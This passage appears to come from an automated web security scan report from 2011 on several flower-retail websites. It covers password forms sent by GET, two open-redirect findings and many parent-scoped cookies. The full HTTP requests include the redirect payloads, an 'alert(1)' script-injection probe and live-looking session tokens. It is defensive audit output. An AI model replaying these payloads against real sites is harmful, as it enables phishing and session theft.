All forms submitting passwords should use the POST method. To achieve this, you should specify the method attribute of the FORM tag as method="POST". It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.


10.1. http://www.ftd.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.ftd.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Content-Type: text/html
Date: Mon, 09 May 2011 01:00:16 GMT
X-Varnish: 729964464 729931173
Age: 611
Via: 1.1 varnish
Connection: keep-alive
Content-Length: 134998


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.c
...[SNIP]...
<div id="toolbar_signin_form" width="240" style="z-index:1001">
<form style="margin:0px;" action="https://ordering.ftd.com/350/signin/">
<table width="240" border="0" cellpadding="1">
...[SNIP]...
</label>
<input class="password" type="password" name="password" value="" maxlength="18" style="width:125px;" /></div>
...[SNIP]...

10.2. http://www.ftd.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.ftd.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Content-Type: text/html
Date: Mon, 09 May 2011 01:00:16 GMT
X-Varnish: 729964464 729931173
Age: 611
Via: 1.1 varnish
Connection: keep-alive
Content-Length: 134998


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.c
...[SNIP]...
<div id="billing_page_signin_popup" width="273">

<form action="https://ordering.ftd.com/350/signin/">
<table width=273 border=0 cellpadding=1>
...[SNIP]...
<td width='60%' align=left><input type="password" name="password" value="" size="12" maxlength="18" /></td>
...[SNIP]...

11. Open redirection
There are 2 instances of this issue:

Issue background

Open redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application which causes a redirection to an arbitrary external domain. This behaviour can be leveraged to facilitate phishing attacks against users of the application. The ability to use an authentic application URL, targeting the correct domain with a valid SSL certificate (if SSL is used), lends credibility to the phishing attack because many users, even if they verify these features, will not notice the subsequent redirection to a different domain.

Issue remediation

If possible, applications should avoid incorporating user-controllable data into redirection targets. In many cases, this behaviour can be avoided in two ways:

If it is considered unavoidable for the redirection function to receive user-controllable input and incorporate this into the redirection target, one of the following measures should be used to minimize the risk of redirection attacks:


11.1. http://ad.trafficmp.com/a/bpix [r parameter]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ad.trafficmp.com
Path:   /a/bpix

Issue detail

The value of the r request parameter is used to perform an HTTP redirect. The payload http%3a//a81049c2410b28106/a%3f was submitted in the r parameter. This caused a redirection to the following URL:

Request

GET /a/bpix?adv=1657&id=1&r=http%3a//a81049c2410b28106/a%3f HTTP/1.1
Host: ad.trafficmp.com
Proxy-Connection: keep-alive
Referer: http://adsfac.us/pct_mx.asp?L=305606&source=if
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid2=470fb0bcf-3fea-4322-beeb-57f5828c5936-gmr873a3; dly2=3-lkkjy3-P~hoc~0~1uo0~1-; dmg2=2-null7566%4050%4057+53%3A01%3A72%3ANZ+%7Cnulll%7CHHF%7CX357%7CIIG%7CQ599.055%7CS50127%7C1fbsgynlre.pbz%7CJ078%7CWfbsgynlre+grpuabybtvrf+vap.%7CLfgbjr%7CR%40527.191%7Cnull%40955%7CDoebnqonaq%7CZ%3F%7C-; hst2=3-lkkjy3-1~70y9vrnt7vq8~146z~2ihm~0-; pct=1-oevyvt~gn7ey36j-vOrunivbe~gn7ey36i-yhpvq~gn7ey36j-; T_de95=ahc%3Aljs1%3A1; rth=2-ljzkpb-ahc~ljs1~1~1-g9g~lg1x~1~1-g9c~ld22~1~1-gyx~kz8s~1~1-jxb~e876~1~1-eo7~861h~1~1-dlx~6ot5~1~1-7p9~0~1~1-

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Mon, 09 May 2011 01:01:26 GMT
Location: http://a81049c2410b28106/a?
Connection: close
Set-Cookie: T_de95=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_ifr9=gj9%3Ax0t3%3A1; Domain=trafficmp.com; Expires=Tue, 08-May-2012 01:01:26 GMT; Path=/
Set-Cookie: rth=2-ljzkpb-gj9~x0t3~1~1-ahc~ljs1~1~1-g9g~lg1x~1~1-g9c~ld22~1~1-gyx~kz8s~1~1-jxb~e876~1~1-eo7~861h~1~1-dlx~6ot5~1~1-7p9~0~1~1-; Domain=trafficmp.com; Expires=Tue, 08-May-2012 01:01:26 GMT; Path=/
Content-Length: 0


11.2. http://pix04.revsci.net/K10145/a3/0/3/pg.302 [tgt parameter]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /K10145/a3/0/3/pg.302

Issue detail

The value of the tgt request parameter is used to perform an HTTP redirect. The payload http%3a//a3ca190b6a3d9a078/a%3fhttp%3a//ads.revsci.net/adserver/ako%3factivate%26type%3dgif%26csid%3dK10145 was submitted in the tgt parameter. This caused a redirection to the following URL:

Request

GET /K10145/a3/0/3/pg.302?D=DM_LOC%3Dhttp%253A%252F%252F1800flowers.com%252Fwelcome&tgt=http%3a//a3ca190b6a3d9a078/a%3fhttp%3a//ads.revsci.net/adserver/ako%3factivate%26type%3dgif%26csid%3dK10145 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://adsfac.us/pct_mx.asp?L=305606&source=if
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: rtc_JXtz=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5E+BsXIQT7v8flOljrAByA1W2ycLqLcluVNv9K55n2eInpkeKzd0i8xbZOw2uBymAsekHTwXtpxx6X9QD1SJv2fw+YUoCsZRmCQYyjnQFQDPVfiYLeSoPxDBs89GWWbRUoRZrPYPRzYFf2oW7z9E4935niTvO+hYyvUJ1hgkhKNykF+vhgAdnVcJkCktu6nmYMKYjipirvscWXOQUM/muJngKMXOdiUUr5H8iSfUS1Ti9zDxtJZ3a4czan0kSMmQx+yu5iu0vjyaeuZUtgU8lKzHoFuDL1t1EXS9Wk5gVkA14oI9Z3BwztVExZGUHmKrl0J+PfTd1kHFZrKuTKD0M5ShSkbZRYXgRTa8ZHAfRJlfMDNpnALK3uAp0XE+BKhu4adINtXpLS/Qg8n2XHs0abQpDsM1AaNNUelKIaY3OH5Q/2xunvwlEIMyZjQYvOh3lFgasKdor2OvGa71mS4N1jn3yucbenW/rUUS0XrstbH5Y4v5VYYn8yLbpeMAGpL4pg+Go0xcg5bMw5s6uie4a47d; Domain=.revsci.net; Expires=Tue, 08-May-2012 01:02:54 GMT; Path=/
Set-Cookie: rtc_jOph=MLvntzM1ZwprJ5GrFviWjmmgATvMNHGJjojTTrWSZIpIFNkgDw/K4gucx48Ansn8gFdhbSFjRTa6QTj/I+16qFvFR8txZ3XhW+h/MeB/oGJTuWd71KWU93xLd4iO2rbczqqb71ITWUbp6EX0wNdtopvMxVqaM1JqYfNKs97ZtBaRULM0PwDcs+nUakr6T4pQ6ZAhwqqC8M5QeQgL3Mwz/l/LO7TuRHS3DG/WEBaa4GMZypMTtieoEqNYKS5uaQdc9YsZ/I7stOdJLd7Hv2XYRUoNtaop227HsWyGbHxMn003mjucGc0mruqE+6DHP6brM6nM6x/tn7oZ2DjdBMJUOZiv9xqjlXnqcVjrB3kXcNTeDq09E5IMKoYrVJlZkK6uobYwka3tRmxkmifKh23k49KG9Bf6S2yRaNGnAYLK+zm7JATIxubd282sNX+n1154JTW43J8wLUy5/9w1/V1bn+LfnLjopCoy5O0KIgr5+yVcorYv+yTBZ8FhgCJA+Q8QvQjH/z6qkFkkgV2Pc0Qu8ePOuvk8qolmk5a5cRl/uMAl5d1L5fAWohFKLmeKHnIc1teXHxZ62z3xlAPoH3vSe3gvL1dmnj44UotfcgD9gjypLg/DU9uqsl/Rdd2M4KoI4aNAtW2PewAt7/uqPhIVZ2lA67g753Fs+YYdF+aGv8uJwGCyFeT/2FR7o49m55h8Gwxj243dmAFbzNMgnnyKGgxLPowo3XlGRBBhnfGcjmQaduyakw2Situk66TlalCm1TQvRzzJbNCx+dssYOfOQB0bbtJ2ntUVoY0/MWG+7X9mFMcU0K1YsXlTv3JLgSG9szKwKoXeXI5nGPmexJQamIZZRu75FQen7qI5XVSM/FyhyjLG6RJHjFKcgLVTWbop0qonwtOz+dRaa+XzimvUgmjE/LsOByg4WyNecM6WuqsLzQSwbwkJu6ayeu/z8NTC7c0uuc9GN4iMyZ0VRwyeREtwXmyzI9BFcLyZ3Rs4ivUj2RjCjvtSsNNRHe2053cF2Vi66vu8vK0TwhhQ+4nNefilYUbTA6wV1dbQtthV8yc5tkCS4xO8RM2JqwjJ+2RL0MnC0HJ4Sa9kFkqhq5GF29eaWIKbJnhrkHmZYVI20kuZatlwGXCzd05n7WE/cFig6PF+oHMyVEvg3H2Geqve6dtrbR5/nlqFYJUJmU1LO9t6E30Vexgt/OqPCKtq5Buy0heNFn43D/XEPUM075oPE41B7rGtcoZLDHSX5xusWqM7Xz3Yy0rj1w/OGBhEfzOXP0tA8vgBAjPNzEOqo9q4g3TV0zqIlK03g3UEsVsKd8lrYh6vves5TCqBe0HeDGyLF1ZryuAIiKWwjLAn92Tu49HaCCp5ZapUWKSIpxW6EBmQA4m6a+VSTrtsZqZKuqbIAMmb6Z5nlEJ0CvScdpzM8bELtNupCMCENC4+mcWsy8PXof63WNfpjPhyWcxL6XPwO+XIvL1yoRu187rFg4rnh0OUfdRdE7b+DsMlXGSWyiWEOb7KYoa7LZDfbPfYMXY=; Domain=.revsci.net; Expires=Tue, 08-May-2012 01:02:54 GMT; Path=/
X-Proc-ms: 3
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: http://a3ca190b6a3d9a078/a?http://ads.revsci.net/adserver/ako?activate&type=gif&csid=K10145
Content-Length: 0
Date: Mon, 09 May 2011 01:02:53 GMT


12. Cookie scoped to parent domain
There are 39 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


12.1. http://ww30.1800baskets.com/include/cookieCloner.asp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ww30.1800baskets.com
Path:   /include/cookieCloner.asp

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /include/cookieCloner.asp?tablink=true&redirecturl=template.do?id=template3&page=2000&persistent=847b741e4593439b8e3ed6040ba46630&shopperid=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618&brandCode=1001&banner= HTTP/1.1
Host: ww30.1800baskets.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/collection.do?dataset=10305
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Mon, 09 May 2011 01:15:57 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Location: http://ww30.1800baskets.com/template.do?id=template3&page=2000
Content-Length: 0
Set-Cookie: JSESSIONID=0000s_k0fIDZcMvgOtLcaDZHOiR:-1; Path=/
Set-Cookie: ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618; Expires=Thu, 06-May-21 01:15:56 GMT; Path=/; Domain=1800baskets.com
Set-Cookie: FSESSIONID=847b741e4593439b8e3ed6040ba46630; Path=/; Domain=1800baskets.com
Set-Cookie: brandCode=1001; Path=/; Domain=1800baskets.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/plain
Content-Language: en-US


12.2. http://ww30.1800flowers.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ww30.1800flowers.com
Path:   /

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: ww30.1800flowers.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:00:38 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: FSESSIONID=2f6aa588e33f44c3bb0191955def6935; Path=/; Domain=1800flowers.com
Set-Cookie: brandCode=1001; Path=/; Domain=1800flowers.com
Set-Cookie: ShopperManagerEnterprise=41db6fdb-b7c6-458a-b4c5-a2060d927f3c; Expires=Thu, 06-May-21 01:00:38 GMT; Path=/; Domain=1800flowers.com
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 63361


<html>

<head>

<meta http-equiv="Content-Type" content="text/html;charset=UTF-8">
<!--MSN--><meta name="msvalidate.01" content="7372219C2822
...[SNIP]...

12.3. http://www.cherrymoonfarms.com/default.aspx

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.cherrymoonfarms.com
Path:   /default.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef HTTP/1.1
Host: www.cherrymoonfarms.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: BrowsingStore=p4m5s4gmscsdxjspfxzi5djy; domain=cherrymoonfarms.com; path=/
Set-Cookie: ASP.NET_SessionId=p4m5s4gmscsdxjspfxzi5djy; path=/; HttpOnly
Set-Cookie: THIRTEENMONTHS_CMF=TestAssignmentValues=nta-2,xca-1,nte-1,cpz-1,csc-4,ntb-1,ntc-1,xcb-1,xcc-1,cfq-1,ntd-2; domain=.cherrymoonfarms.com; expires=Sat, 09-Jun-2012 12:22:05 GMT; path=/
Set-Cookie: ENDOFDAY_CMF=TestAssignmentValues=,chh-1,cks-1,mpsmediapersonalitysplit-1,ckt-2; domain=.cherrymoonfarms.com; expires=Tue, 10-May-2011 06:59:59 GMT; path=/
Set-Cookie: CURRENTSESSION_CMF=TestConfigDateTimeUpdated=5/9/2011 5:22:05 AM; domain=.cherrymoonfarms.com; path=/
Set-Cookie: CURRENTSESSION_=IPAddress=173.193.214.243; domain=.proflowers.com; path=/
Set-Cookie: PRVD=SiteSplitID=57; domain=.cherrymoonfarms.com; expires=Thu, 12-May-2011 12:22:05 GMT; path=/
Set-Cookie: CMF_BrowserId=648da04f-a5ff-42b4-9370-fae55b915cad; domain=.cherrymoonfarms.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: CMF_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; domain=.cherrymoonfarms.com; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:22:04 GMT
Content-Length: 107521


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<html xmlns="http://www.w3.org/1999/xhtml">
   <head><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/st
...[SNIP]...

12.4. http://www.personalcreations.com/default.aspx

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.personalcreations.com
Path:   /default.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef HTTP/1.1
Host: www.personalcreations.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: BrowsingStore=wz0kwfor3fvne2lfjnllwoah; domain=personalcreations.com; path=/
Set-Cookie: ASP.NET_SessionId=wz0kwfor3fvne2lfjnllwoah; path=/; HttpOnly
Set-Cookie: THIRTEENMONTHS_PCR=TestAssignmentValues=nta-1,ttb-3,nte-3,ntc-2,tpr-1,ntb-1,xta-1,tpp-4,tbc-2,ntd-1,xtc-1,tmm-1,xtb-1,trr-2,tvo-1,tpf-1; domain=.personalcreations.com; expires=Sat, 09-Jun-2012 12:23:17 GMT; path=/
Set-Cookie: ENDOFDAY_PCR=TestAssignmentValues=,txb-1,tkt-2,thp-2,txa-2,tks-1,txc-1,mpsmediapersonalitysplit-2; domain=.personalcreations.com; expires=Tue, 10-May-2011 06:59:59 GMT; path=/
Set-Cookie: CURRENTSESSION_PCR=TestConfigDateTimeUpdated=5/9/2011 5:23:17 AM; domain=.personalcreations.com; path=/
Set-Cookie: CURRENTSESSION_=IPAddress=173.193.214.243; domain=.proflowers.com; path=/
Set-Cookie: PRVD=SiteSplitID=5; domain=.personalcreations.com; expires=Thu, 12-May-2011 12:23:17 GMT; path=/
Set-Cookie: PCR_BrowserId=7e39bf7a-035a-482a-a5ba-f1400b3f220a; domain=.personalcreations.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: PCR_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; domain=.personalcreations.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:23:19 GMT
Content-Length: 120465


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<html xmlns="http://www.w3.org/1999/xhtml">
   <head><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/st
...[SNIP]...

12.5. http://www.proflowers.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.proflowers.com
Path:   /

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.proflowers.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: BrowsingStore=vdbbjo2ye2hg5x4cildhrv3t; domain=proflowers.com; path=/
Set-Cookie: ASP.NET_SessionId=vdbbjo2ye2hg5x4cildhrv3t; path=/; HttpOnly
Set-Cookie: THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-2,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-7,nte-3,phl-2,ppv-3,phr-1,nta-1,xpc-1,ntb-1,pnp-1,ppr-1,pmm-2,pem-1,pfe-3,pml-0; domain=.proflowers.com; expires=Sat, 09-Jun-2012 12:07:41 GMT; path=/
Set-Cookie: ENDOFDAY_PFC=TestAssignmentValues=,pxc-3,mpsmediapersonalitysplit-1,zzd-1,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; domain=.proflowers.com; expires=Tue, 10-May-2011 06:59:59 GMT; path=/
Set-Cookie: CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:41 AM; domain=.proflowers.com; path=/
Set-Cookie: CURRENTSESSION_=IPAddress=173.193.214.243; domain=.proflowers.com; path=/
Set-Cookie: PRVD=SiteSplitID=50; domain=.proflowers.com; expires=Thu, 12-May-2011 12:07:41 GMT; path=/
Set-Cookie: PFC_BrowserId=92c68dc8-4b77-41de-89a7-78ac8cdfbbd3; domain=.proflowers.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; domain=.proflowers.com; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:07:40 GMT
Content-Length: 88497


<noscript>
<div class="splashBox">
   <font style="font-size:16pt;color: #fff786;margin: 10px;">We&rsquo;re Sorry - </font>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not ha
...[SNIP]...

12.6. http://www.proflowers.com/house-plants-PBS

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.proflowers.com
Path:   /house-plants-PBS

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef HTTP/1.1
Host: www.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; CURRENTSESSION_=IPAddress=173.193.214.243; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253Ahome%25253Ahome%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.proflowers.com%25252Fhouse-plants-PBS%25253Ftile%25253Dhmpg_podA%252526Ref%25253DHomeNoRef%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:43 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:10:43 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:10:43 GMT
Content-Length: 184823


<noscript>
<div class="splashBox">
   <font style="font-size:16pt;color: #fff786;margin: 10px;">We&rsquo;re Sorry - </font>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not ha
...[SNIP]...

